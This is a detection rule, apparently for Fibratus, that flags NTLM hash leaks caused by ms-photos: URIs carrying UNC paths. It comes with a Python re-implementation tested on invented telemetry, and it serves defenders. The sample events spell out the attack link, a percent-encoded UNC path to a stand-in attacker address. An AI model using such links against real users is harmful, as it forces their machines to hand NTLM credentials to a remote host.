credential_access_potential_ntlm_hash_leak_via_ms_photos.yml
name: Potential NTLM hash leak via MS Photos
id: b5b70c6d-e265-477e-bd62-b4d05089e2ab
version: 1.0.0
description: |
  Detects a potential NTLM hash disclosure via abuse of the ms-photos: URI
  scheme with a UNC path parameter. An attacker can craft a specially formatted
  link that, when opened, launches Microsoft Photos directly from the browser
  with a \\host\share\file target. Resolving that UNC path makes Windows
  connect to the remote host over SMB and authenticate to it, potentially
  leaking NTLM credentials. The rule correlates the Photos.exe launch with a
  subsequent SMB (TCP/445) connection from the System process to an address
  outside loopback and private ranges.
labels:
  tactic.id: TA0006
  tactic.name: Credential Access
  tactic.ref: https://attack.mitre.org/tactics/TA0006/
  technique.id: T1187
  technique.name: Forced Authentication
  technique.ref: https://attack.mitre.org/techniques/T1187/
references:
  - https://github.com/rubenformation/ms-photos_NTLM_Leak
# Stage 1: Photos.exe started through the shell (parent explorer.exe) with a
# percent-encoded UNC path (%5C%5C is "\\") in the fileName parameter.
# Stage 2: within one minute, the System process (PID 4, which owns the SMB
# client connection rather than Photos.exe itself) connects to TCP/445 on an
# address outside loopback and RFC 1918 space.
condition: >
  sequence
  maxspan 1m
    |spawn_process and
     ps.parent.name ~= 'explorer.exe' and ps.name ~= 'Photos.exe' and
     ps.cmdline imatches '*ms-photos:viewer?fileName=%5C%5C*%5C*%5C*'
    |
    |connect_socket and
     evt.pid = 4 and net.dport = 445 and
     not cidr_contains(net.dip, '127.0.0.0/8', '10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16')
    |
output: >
  Potential NTLM hash leak via MS Photos UNC path at address $2.net.dip
severity: high
min-engine-version: 3.0.0
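The two-stage sequence above, re-implemented in Python and replayed over constructed sample telemetry so each condition can be inspected: this is an added example, not code from the Fibratus rule set or from the ms-photos_NTLM_Leak repository. Field names mirror the rule (ps.name, ps.cmdline, net.dip, net.dport, evt.pid); the Event type, the sample events, the timestamps and the TEST-NET addresses are all made up for this example. It also decodes the fileName parameter back to the UNC path, which the rule itself does not do.

```python
"""Added example, not part of the Fibratus rule or the ms-photos_NTLM_Leak
project: a stand-alone re-implementation of the rule's two-stage sequence,
run over constructed sample events. Event records and addresses are invented."""
import fnmatch
import ipaddress
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Values copied from the rule.
CMDLINE_PATTERN = "*ms-photos:viewer?fileName=%5C%5C*%5C*%5C*"
MAXSPAN = timedelta(minutes=1)
EXCLUDED_NETS = [ipaddress.ip_network(c) for c in
                 ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
SYSTEM_PID = 4   # the SMB client connects out from the System process, not Photos.exe
SMB_PORT = 445


@dataclass
class Event:                  # hypothetical flat event shape, fields named after the rule
    ts: datetime
    kind: str                 # "spawn_process" or "connect_socket"
    pid: int = 0
    ps_name: str = ""
    ps_parent_name: str = ""
    ps_cmdline: str = ""
    net_dip: str = ""
    net_dport: int = 0


def cidr_contains(ip: str, networks) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


def matches_spawn(ev: Event) -> bool:
    """Stage 1: Photos.exe started by explorer.exe with a UNC fileName in the ms-photos: URI."""
    return (ev.kind == "spawn_process"
            and ev.ps_parent_name.lower() == "explorer.exe"
            and ev.ps_name.lower() == "photos.exe"
            # imatches in the rule is a case-insensitive glob; lowercase both sides
            and fnmatch.fnmatchcase(ev.ps_cmdline.lower(), CMDLINE_PATTERN.lower()))


def matches_connect(ev: Event) -> bool:
    """Stage 2: PID 4 opens TCP/445 to an address outside the excluded ranges."""
    return (ev.kind == "connect_socket"
            and ev.pid == SYSTEM_PID
            and ev.net_dport == SMB_PORT
            and not cidr_contains(ev.net_dip, EXCLUDED_NETS))


def unc_target(cmdline: str) -> str:
    """Decode the fileName parameter back to the UNC path Photos was asked to open."""
    uri = cmdline[cmdline.lower().find("ms-photos:"):].strip().strip('"')
    query = urlsplit(uri).query                      # urlsplit accepts the ms-photos: scheme
    return parse_qs(query).get("fileName", [""])[0]  # parse_qs percent-decodes %5C to backslash


def detect(events) -> list:
    """Replay events in time order; alert when stage 2 follows stage 1 within MAXSPAN."""
    alerts, pending = [], []
    for ev in sorted(events, key=lambda e: e.ts):
        if matches_spawn(ev):
            pending.append(ev)
        elif matches_connect(ev):
            pending = [p for p in pending if ev.ts - p.ts <= MAXSPAN]  # enforce maxspan
            if pending:
                first = pending.pop(0)
                alerts.append({"address": ev.net_dip,
                               "unc_path": unc_target(first.ps_cmdline),
                               "delay_s": (ev.ts - first.ts).total_seconds()})
    return alerts


# Constructed sample telemetry (not real logs).
T0 = datetime(2024, 1, 1, 12, 0, 0)
PHOTOS = r'"C:\Program Files\WindowsApps\Microsoft.Windows.Photos\Photos.exe" '
SAMPLE_EVENTS = [
    Event(T0, "spawn_process", pid=5012, ps_name="Photos.exe", ps_parent_name="explorer.exe",
          ps_cmdline=PHOTOS + "ms-photos:viewer?fileName=%5C%5C203.0.113.10%5Cshare%5Choliday.jpg"),
    # SMB to an internal file server: excluded by cidr_contains.
    Event(T0 + timedelta(seconds=2), "connect_socket", pid=4, net_dip="10.0.0.5", net_dport=445),
    # SMB to the attacker host named in the UNC path: this completes the sequence.
    Event(T0 + timedelta(seconds=5), "connect_socket", pid=4, net_dip="203.0.113.10", net_dport=445),
    # Benign: a local file opened through the same URI scheme (no leading %5C%5C).
    Event(T0 + timedelta(seconds=30), "spawn_process", pid=5100, ps_name="Photos.exe",
          ps_parent_name="explorer.exe",
          ps_cmdline=PHOTOS + "ms-photos:viewer?fileName=C%3A%5CUsers%5Cbob%5Cpic.jpg"),
    # A second UNC launch whose SMB connection arrives after maxspan: no alert.
    Event(T0 + timedelta(minutes=2), "spawn_process", pid=5200, ps_name="Photos.exe",
          ps_parent_name="explorer.exe",
          ps_cmdline=PHOTOS + "ms-photos:viewer?fileName=%5C%5C198.51.100.7%5Cshare%5Cx.jpg"),
    Event(T0 + timedelta(minutes=4), "connect_socket", pid=4, net_dip="198.51.100.7", net_dport=445),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"Potential NTLM hash leak via MS Photos UNC path {a['unc_path']} "
              f"at address {a['address']} ({a['delay_s']:.0f}s after launch)")
```

Running it on the sample events produces exactly one alert, for 203.0.113.10: the connection to 10.0.0.5 is dropped by the CIDR exclusion, the local-file launch never satisfies the `%5C%5C` prefix, and the last pair falls outside the one-minute window. Note that the glob `?` in `viewer?fileName` is a single-character wildcard in both fnmatch and the rule's pattern, which happens to match the literal `?`; the stricter check, if wanted, is a literal string search.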